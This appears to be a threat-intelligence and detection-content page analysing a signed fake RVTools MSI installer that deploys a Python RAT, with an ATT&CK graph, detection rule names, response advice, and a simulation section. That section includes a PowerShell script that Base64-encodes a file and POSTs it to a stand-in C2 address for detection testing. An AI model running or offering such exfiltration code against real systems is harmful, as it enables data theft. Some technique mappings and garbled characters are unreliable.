Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A malicious MSI installer signed with a legitimate certificate masquerades as the RVTools utility used by VMware administrators. Once executed, the installer drops a VBScript that launches PowerShell to download a large ZIP archive from Dropbox. That archive contains a portable Python environment that runs a multi-stage RAT capable of reconnaissance, persistence, and communication with hard-coded command-and-control servers.
Investigation
The analysis traced the MSI to a custom VBScript action, Binary.MyScript.vbs, which decoded an obfuscated PowerShell command. That command downloaded a winp.zip payload into %APPDATA%, extracted Python components and scripts such as collector.py and Pmanager.py, and then established persistence through registry Run keys and a scheduled task after reboot. Researchers also found that the RAT encrypted collected data with RC4 and beaconed to five fixed IP addresses at five-minute intervals.
Mitigation
Organizations should enforce strict code-signing validation with live OCSP or CRL checks, block untrusted MSI execution, and monitor for suspicious VBScript custom actions embedded in installer packages. Defenders should also prevent automatic execution of downloaded scripts, watch for new Run key entries and scheduled task creation, and alert on outbound traffic to unfamiliar hard-coded IP addresses.
Response
If this activity is detected, isolate the affected endpoint immediately, collect the MSI, VBScript, and extracted payload files for forensic analysis, and remove all persistence artifacts, including the Run key and scheduled task. The identified command-and-control IP addresses should be blocked at the firewall, and a broader review of credentials and Active Directory activity should be performed to determine whether lateral movement occurred.
"graph TB %% Class definitions classDef phase fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef artifact fill:#e0e0e0 classDef persistence fill:#c2f0c2 classDef c2 fill:#f9c2c2 classDef evasion fill:#f0e68c %% Phases phase_initial_access["<b>Phase</b>: Initial Access<br/><b>Action</b> – Victim executes a signed malicious MSI that masquerades as RVTools."] class phase_initial_access phase phase_execution["<b>Phase</b>: Execution<br/><b>Action</b> – MSI uses Msiexec to run a VBScript which launches a hidden PowerShell downloader."] class phase_execution phase phase_payload["<b>Phase</b>: Payload Deployment<br/><b>Action</b> – Archive is unpacked to a portable WinPython environment containing collector.py and manager.py."] class phase_payload phase phase_persistence["<b>Phase</b>: Persistence<br/><b>Action</b> – Python manager creates Registry Run key, Scheduled Task and Active Setup entry."] class phase_persistence phase phase_c2["<b>Phase</b>: Command and Control<br/><b>Action</b> – Collected data is archived, encrypted with RC4 and exfiltrated over HTTP POST to hardu2011coded IPs."] class phase_c2 phase phase_evasion["<b>Phase</b>: Defense Evasion<br/><b>Action</b> – Use of signed binaries, proxy execution, and character obfuscation to bypass detections."] class phase_evasion phase %% Techniques for Initial Access tech_user_execution["<b>Technique</b> T1204.002 User Execution: Malicious File<br/>Victim runs a malicious file they believe to be legitimate."] class tech_user_execution technique tech_masquerading["<b>Technique</b> T1036.001 Masquerading<br/>Binary is signed and named like a legitimate utility (RVTools)."] class tech_masquerading technique tech_trusted_dev_proxy["<b>Technique</b> T1127 Trusted Developer Utilities Proxy Execution<br/>Signed binary is used to bypass reputation checks."] class tech_trusted_dev_proxy technique %% Techniques for Execution tech_msiexec_proxy["<b>Technique</b> T1218.007 System Binary Proxy Execution: Msiexec<br/>Msiexec is invoked to run the malicious MSI."] class tech_msiexec_proxy technique tech_vbscript["<b>Technique</b> T1059.005 Command and Scripting Interpreter: Visual Basic<br/>Custom action launches a VBScript payload."] class tech_vbscript technique tech_powershell["<b>Technique</b> T1059.001 Command and Scripting Interpreter: PowerShell<br/>VBScript decodes and executes a hidden PowerShell download command."] class tech_powershell technique %% Techniques for Payload Deployment tech_archive_custom["<b>Technique</b> T1560.003 Archive Collected Data: Archive via Custom Method<br/>33u202fMB zip (winp.zip) is downloaded and unpacked to create a portable Python environment."] class tech_archive_custom technique %% Techniques for Persistence tech_registry_run["<b>Technique</b> T1037.004 Boot or Logon Initialization Scripts: Registry Run<br/>Registry Run key is created to launch manager.py at startup."] class tech_registry_run persistence tech_scheduled_task["<b>Technique</b> T1053 Scheduled Task/Job<br/>Daily scheduled task is created to run with SYSTEM privileges."] class tech_scheduled_task persistence tech_active_setup["<b>Technique</b> T1547.014 Boot or Logon Autostart Execution: Active Setup<br/>Active Setup entry is added to ensure execution for each user."] class tech_active_setup persistence tech_hijack_execution["<b>Technique</b> T1574 Hijack Execution Flow<br/>Scheduled task is used to hijack normal execution paths."] class tech_hijack_execution evasion %% Techniques for Command and Control tech_exfil_unencrypted["<b>Technique</b> T1048.003 Exfiltration Over Unencrypted Nonu2011C2 Protocol<br/>Data is sent via HTTP POST to hardu2011coded IP addresses."] class tech_exfil_unencrypted c2 tech_exfil_asymmetric["<b>Technique</b> T1048.002 Exfiltration Over Asymmetric Encrypted Nonu2011C2 Protocol<br/>Data is encrypted with RC4 before transmission."] class tech_exfil_asymmetric c2 %% Techniques for Defense Evasion tech_system_script_proxy["<b>Technique</b> T1216.002 System Script Proxy Execution: SyncAppvPublishingServer<br/>Trusted scripts act as proxies to hide malicious activity."] class tech_system_script_proxy evasion tech_system_binary_proxy["<b>Technique</b> T1218 System Binary Proxy Execution<br/>Signed utilities (Msiexec) are abused to bypass application control."] class tech_system_binary_proxy evasion %% Artifacts artifact_msi["<b>Artifact</b>: malicious_RVTools.msi<br/>Signed MSI used for initial access."] class artifact_msi artifact artifact_zip["<b>Artifact</b>: winp.zip<br/>Dropbox hosted archive containing portable WinPython."] class artifact_zip artifact artifact_python_env["<b>Artifact</b>: WinPython environment<br/>Contains collector.py and manager.py for reconnaissance."] class artifact_python_env artifact artifact_registry_key["<b>Artifact</b>: Registry Run Key<br/>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinPythonMgr"] class artifact_registry_key artifact artifact_scheduled_task["<b>Artifact</b>: Scheduled Task<br/>Name: WinPythonDaily, runs with SYSTEM."] class artifact_scheduled_task artifact artifact_active_setup["<b>Artifact</b>: Active Setup Entry<br/>HKLM\Software\Microsoft\Active Setup\Installed Components\WinPython"] class artifact_active_setup artifact artifact_c2_ip["<b>Artifact</b>: C2 IP addresses<br/>Hardu2011coded IPv4 addresses contacted over HTTP."] class artifact_c2_ip artifact %% Connections phase_initial_access –>|uses| tech_user_execution phase_initial_access –>|uses| tech_masquerading phase_initial_access –>|uses| tech_trusted_dev_proxy phase_initial_access –>|delivers| artifact_msi tech_user_execution –>|executes| artifact_msi tech_masquerading –>|enables| artifact_msi tech_trusted_dev_proxy –>|bypasses| artifact_msi phase_execution –>|leverages| tech_msiexec_proxy tech_msiexec_proxy –>|runs| tech_vbscript tech_vbscript –>|launches| tech_powershell tech_powershell –>|downloads| artifact_zip artifact_zip –>|unpacked to create| artifact_python_env phase_payload –>|contains| artifact_python_env phase_persistence –>|creates| tech_registry_run phase_persistence –>|creates| tech_scheduled_task phase_persistence –>|creates| tech_active_setup phase_persistence –>|uses| tech_hijack_execution tech_registry_run –>|writes| artifact_registry_key tech_scheduled_task –>|creates| artifact_scheduled_task tech_active_setup –>|writes| artifact_active_setup phase_c2 –>|archives and encrypts data| tech_archive_custom tech_archive_custom –>|sends via| tech_exfil_unencrypted tech_exfil_unencrypted –>|uses| artifact_c2_ip tech_exfil_unencrypted –>|also uses| tech_exfil_asymmetric phase_evasion –>|applies| tech_system_script_proxy phase_evasion –>|applies| tech_system_binary_proxy tech_system_binary_proxy –>|facilitates| tech_msiexec_proxy tech_system_script_proxy –>|facilitates| tech_vbscript "
Attack Flow
Detections
LOLBAS WScript / CScript (via process_creation)
View
Python Execution from Suspicious Folders (via cmdline)
View
The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
View
An Archive Was Extracted To Suspicious Directory Using Powershell (via powershell)
View
Possible Dropbox API Sub-Domains DNS Queries Intiated by not Legit Processes (via dns_query)
View
IOCs (HashSha256) to detect: RVTools Masquerade: How a Signed Fake Installer Deploys a Modular Python RAT
View
IOCs (HashMd5) to detect: RVTools Masquerade: How a Signed Fake Installer Deploys a Modular Python RAT
View
Detection of Data Exfiltration via Hardcoded IPs and HTTP POST [Windows Network Connection]
View
Detection of Malicious PowerShell Hidden Execution and Invoke-WebRequest [Windows Powershell]
View
Suspicious RVTools Fake Installer Deploying Python RAT [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An adversary who has already established a foothold on the victim machine decides to exfiltrate a small data set (e.g.,C:Tempsecret.txt). To avoid triggering generic outbound‑traffic alerts, the actor uses a PowerShell one‑liner that performs an HTTP POST directly to one of the hard‑coded C2 IPs (192.0.2.10). The command is scheduled via a Windows Scheduled Task to ensure persistence (T1546.013). No additional binaries are dropped, keeping the activity “living‑off‑the‑land”. -
Regression Test Script:
# ------------------------------------------------- # PowerShell script – Data exfiltration via hard‑coded IP # ------------------------------------------------- $c2Ip = "192.0.2.10" $c2Port = 80 $uri = "http://$c2Ip/exfil" $file = "C:Tempsecret.txt" # Ensure the file exists (create dummy data for test) if (-Not (Test-Path $file)) { "sensitive data $(Get-Date)" | Out-File -FilePath $file -Encoding ASCII } # Read file content and Base64‑encode it $payload = [Convert]::ToBase64String([IO.File]::ReadAllBytes($file)) # Perform the HTTP POST $body = @{ data = $payload } try { Invoke-WebRequest -Uri $uri -Method POST -Body $body -UseBasicParsing -TimeoutSec 10 Write-Host "Exfiltration attempt sent to $c2Ip" } catch { Write-Error "Exfiltration failed: $_" } -
Cleanup Commands:
# Remove the dummy file Remove-Item -Path "C:Tempsecret.txt" -Force -ErrorAction SilentlyContinue # Delete any scheduled task created for the test (if any) $taskName = "DataExfilTask" if (Get-ScheduledTask -TaskName $taskName -ErrorAction SilentlyContinue) { Unregister-ScheduledTask -TaskName $taskName -Confirm:$false }